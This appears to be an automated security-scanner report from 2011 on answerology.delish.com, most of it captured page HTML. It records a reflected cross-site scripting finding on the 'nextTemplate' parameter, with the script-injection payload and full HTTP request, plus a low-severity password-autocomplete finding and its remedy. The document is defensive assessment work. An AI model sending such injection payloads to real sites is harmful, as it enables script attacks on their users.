s_msn.referrer=''; } s_msn.t(); } try { wlAnalytics.TrackPage(); } catch (e) { $.track.trackInfo.userStatic.requestId = null; $.track.trackPage(); } var spans = document.getElementsByTagName('span'); var adDivs = new Array(); for(var i=0;i<spans.length;i++){ if(spans[i].id.indexOf('ams_del') > -1 && spans[i].firstChild){ if(spans[i].firstChild.nodeName == 'DIV'){ adDivs.push(spans[i].firstChild); } } } for(var i=0;i<adDivs.length;i++){ dapMgr.displayAd(dapMgr.getAdItemIndex(adDivs[i].id)); }}</script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/omniture-tags.js"></script><!-- SHARE THIS SCRIPT DONT REMOVE --><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script><!-- //END FO SHARE THIS SCRIPT --><!-- Social --><!--xs_social_metatag_includes.tmpl--><meta property="og:description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=536265605"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=536265605"></script> <script type="text/javascript" src="/cssjs/headers.js?v=536265605"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'answer_question.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=536265605"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- script type="text/javascript"> if (document.location != top.location) { top.location = document.location; } </script --> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> layout.getHeaderBoxAd('other');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <..
- /index.aspx

/index.aspx

http://answerology.delish.com/index.aspx?template=login.ascx&nextTemplate='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
template GET login.ascx
nextTemplate GET '"--></style></script><script>alert(0x0002FE)</script>

Request

GET /index.aspx?template=login.ascx&nextTemplate='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002FE)%3C/script%3E HTTP/1.1
Referer: http://answerology.delish.com//index.aspx?template=answer_question.ascx
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 14:19:08 GMT
Content-Length: 18549
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>Cooking Tips - Recipe Advice and Help with Cooking</title><meta name="title" content="Cooking Tips - Recipe Advice and Help with Cooking" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.108 9/17/2011 10:19:08 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><link rel="apple-touch-icon" href="/cm/delish/site_images/favicon/apple-touch-icon.png" /><link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/x-icon" /><!-- **** Canonical Meta-tag **** --><link rel="canonical" href="http://www.delish.com/answerology-wrapper/"/><!-- **** RSS **** --><link rel="alternate" type="application/rss+xml" href="http://www.delish.com" /><!-- **** STYLES **** --><!-- MSN Video Player CSS File --><!--<link rel="stylesheet" type="text/css" href="/cm/delish/styles/channels.css"></link>--><link rel="stylesheet" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><script type"text/javascript"> /* Set document.domain early for proper ad render */ try { document.domain = 'delish.com'; } catch(ex){}</script><style type="text/css"> /* IE Hover htc */ body { behavior: url('http://games.delish.com/proxy.aspx?url=http://www.delish.com/cm/delish/scripts/csshover3.htc'); }</style><link rel="stylesheet" href="/cm/delish/styles/global.css" type="text/css" /><link rel="stylesheet" href="/cm/delish/styles/header.css" type="text/css" /><!-- **** SCRIPTS **** --><!-- Static Promo: restrict access if subdomain not match category --><!-- End Static Promo --><script src="/cm/shared/scripts/jquery-1.4.2.min.js" language="javascript" type="text/javascript"></script><!-- refresh ads --><!-- quiz includes --><!-- /quiz includes --><script src="/cm/delish/scripts/jquery.tooltip.pack.js" type="text/javascript" language="javascript"></script><script language="javascript" src="/cm/shared/scripts/jqXMLUtils.js"></script><script src="/cm/shared/scripts/jquery.bgiframe.min.js" type="text/javascript"></script><!-- games_wrapper --><script language="javascript" src="/cm/delish/scripts/rf-tmpl-ext.js" type="text/javascript"></script><script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL CONSTANTSvar articleID = "";var rf_cache_bust = Math.floor(Math.random()*100001);var site_name = "Delish";//Article Source Codevar source_id = "";//Set up the source link type - based on content type//var pageAdsParams = {"sub_cat_prefixes":"","article_type_prefix":null,"site_prefix":"delish","position_list":"ams_delish_1x1,ams_delish_footer,ams_delish_networktout,ams_delish_sponsored_links,ams_delish_top","ad_sub_category_prefix":null,"subdomain":"www","ams_promo":null,"url_name":null,"keywords":null,"browser_path":"/answerology-wrapper/?ignoreCache=1","section_prefix":"answerology-wrapper","ad_category_prefix":null,"cat_prefixes":""};</script><script type="text/javascript" src="/cm/shared/scripts/cookies.js"></script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script><link href="/cm/delish/styles/autocomplete.css" rel="stylesheet" type="text/css"><script src="/cm/delish/scripts/autocomplete_bgiframe_delish.js" type="text/javascript"></script><!--<gTMPL_INCLUDE NAME="xs_script_include_user_session.tmpl">--><!-- TEST script includes xs_script_include_user_session.tmpl DIRECT INSERT--><script>var _ghearst_vars = {};//_ghearst_vars["ams_ads_script_src"] = "";</script><script src="/cm/shared/scripts/get_mag_user_local_v02.js" type="text/javascript" ></script><script>if ($h.session.ha){ $h.util.buildScriptTag("&ha=1"); } else { }</script><!-- Omniture global variable --><script language="javascript">var s_prop49 = '';</script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/login.js"></script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/global.js"></script><!-- search and global js go here --><!-- MSN Video Player Scripts --><script src='/cm/delish/scripts/jquery.simplemodal.js' type='text/javascript'></script><!-- Confirm JS and CSS files for Logout--><script src='/cm/delish/scripts/confirm.js' type='text/javascript'></script><link type='text/css' href='/cm/delish/styles/confirm.css' rel='stylesheet' media='screen' /><!--[if lt IE 7]><link type='text/css' href='/cm/delish/styles/basic_ie.css' rel='stylesheet' media='screen' /><![endif]--><script language="javascript" type="text/javascript" src="/cm/shared/ria/swfobject2.1/swfobject.min.js"></script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/flash.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL FUNCTIONS/*@cc_on @*//*@if (@_jscript_version < 5.7)$(document).ready(function(){ $('#global_footer').css('display','none'); $('#global_footer').css('display','block');});/*@end @*/</script><script language="javascript">function refreshAds(){ //Hearst tracking if (top.s) { pageviewTracking(); } //MSN tracking if (top.s_msn) { if ( s_msn.referrer == location.href ) { s_msn.referrer=''; } s_msn.t(); } try { wlAnalytics.TrackPage(); } catch (e) { $.track.trackInfo.userStatic.requestId = null; $.track.trackPage(); } var spans = document.getElementsByTagName('span'); var adDivs = new Array(); for(var i=0;i<spans.length;i++){ if(spans[i].id.indexOf('ams_del') > -1 && spans[i].firstChild){ if(spans[i].firstChild.nodeName == 'DIV'){ adDivs.push(spans[i].firstChild); } } } for(var i=0;i<adDivs.length;i++){ dapMgr.displayAd(dapMgr.getAdItemIndex(adDivs[i].id)); }}</script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/omniture-tags.js"></script><!-- SHARE THIS SCRIPT DONT REMOVE --><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script><!-- //END FO SHARE THIS SCRIPT --><!-- Social --><!--xs_social_metatag_includes.tmpl--><meta property="og:description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=536265605"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=536265605"></script> <script type="text/javascript" src="/cssjs/headers.js?v=536265605"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'login.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=536265605"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- script type="text/javascript"> if (document.location != top.location) { top.location = document.location; } </script --> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> layout.getHeaderBoxAd('other');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <div id=&q..
Auto Complete Enabled

Auto Complete Enabled
1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /index.aspx/answers/

/index.aspx/answers/ CONFIRMED

http://answerology.delish.com/index.aspx/answers/

Identified Field Name

user.password

Request

GET /index.aspx/answers/ HTTP/1.1
Referer: http://answerology.delish.com/index.aspx/answers/Anniversary-gift.html?popular=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:42:12 GMT
Content-Length: 31229
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>Cooking Tips - Recipe Advice and Help with Cooking</title><meta name="title" content="Cooking Tips - Recipe Advice and Help with Cooking" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.108 9/17/2011 9:42:12 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><link rel="apple-touch-icon" href="/cm/delish/site_images/favicon/apple-touch-icon.png" /><link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/x-icon" /><!-- **** Canonical Meta-tag **** --><link rel="canonical" href="http://www.delish.com/answerology-wrapper/"/><!-- **** RSS **** --><link rel="alternate" type="application/rss+xml" href="http://www.delish.com" /><!-- **** STYLES **** --><!-- MSN Video Player CSS File --><!--<link rel="stylesheet" type="text/css" href="/cm/delish/styles/channels.css"></link>--><link rel="stylesheet" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><script type"text/javascript"> /* Set document.domain early for proper ad render */ try { document.domain = 'delish.com'; } catch(ex){}</script><style type="text/css"> /* IE Hover htc */ body { behavior: url('http://games.delish.com/proxy.aspx?url=http://www.delish.com/cm/delish/scripts/csshover3.htc'); }</style><link rel="stylesheet" href="/cm/delish/styles/global.css" type="text/css" /><link rel="stylesheet" href="/cm/delish/styles/header.css" type="text/css" /><!-- **** SCRIPTS **** --><!-- Static Promo: restrict access if subdomain not match category --><!-- End Static Promo --><script src="/cm/shared/scripts/jquery-1.4.2.min.js" language="javascript" type="text/javascript"></script><!-- refresh ads --><!-- quiz includes --><!-- /quiz includes --><script src="/cm/delish/scripts/jquery.tooltip.pack.js" type="text/javascript" language="javascript"></script><script language="javascript" src="/cm/shared/scripts/jqXMLUtils.js"></script><script src="/cm/shared/scripts/jquery.bgiframe.min.js" type="text/javascript"></script><!-- games_wrapper --><script language="javascript" src="/cm/delish/scripts/rf-tmpl-ext.js" type="text/javascript"></script><script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL CONSTANTSvar articleID = "";var rf_cache_bust = Math.floor(Math.random()*100001);var site_name = "Delish";//Article Source Codevar source_id = "";//Set up the source link type - based on content type//var pageAdsParams = {"sub_cat_prefixes":"","article_type_prefix":null,"site_prefix":"delish","position_list":"ams_delish_1x1,ams_delish_footer,ams_delish_networktout,ams_delish_sponsored_links,ams_delish_top","ad_sub_category_prefix":null,"subdomain":"www","ams_promo":null,"url_name":null,"keywords":null,"browser_path":"/answerology-wrapper/?ignoreCache=1","section_prefix":"answerology-wrapper","ad_category_prefix":null,"cat_prefixes":""};</script><script type="text/javascript" src="/cm/shared/scripts/cookies.js"></script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script><link href="/cm/delish/styles/autocomplete.css" rel="stylesheet" type="text/css"><script src="/cm/delish/scripts/autocomplete_bgiframe_delish.js" type="text/javascript"></script><!--<gTMPL_INCLUDE NAME="xs_script_include_user_session.tmpl">--><!-- TEST script includes xs_script_include_user_session.tmpl DIRECT INSERT--><script>var _ghearst_vars = {};//_ghearst_vars["ams_ads_script_src"] = "";</script><script src="/cm/shared/scripts/get_mag_user_local_v02.js" type="text/javascript" ></script><script>if ($h.session.ha){ $h.util.buildScriptTag("&ha=1"); } else { }</script><!-- Omniture global variable --><script language="javascript">var s_prop49 = '';</script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/login.js"></script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/global.js"></script><!-- search and global js go here --><!-- MSN Video Player Scripts --><script src='/cm/delish/scripts/jquery.simplemodal.js' type='text/javascript'></script><!-- Confirm JS and CSS files for Logout--><script src='/cm/delish/scripts/confirm.js' type='text/javascript'></script><link type='text/css' href='/cm/delish/styles/confirm.css' rel='stylesheet' media='screen' /><!--[if lt IE 7]><link type='text/css' href='/cm/delish/styles/basic_ie.css' rel='stylesheet' media='screen' /><![endif]--><script language="javascript" type="text/javascript" 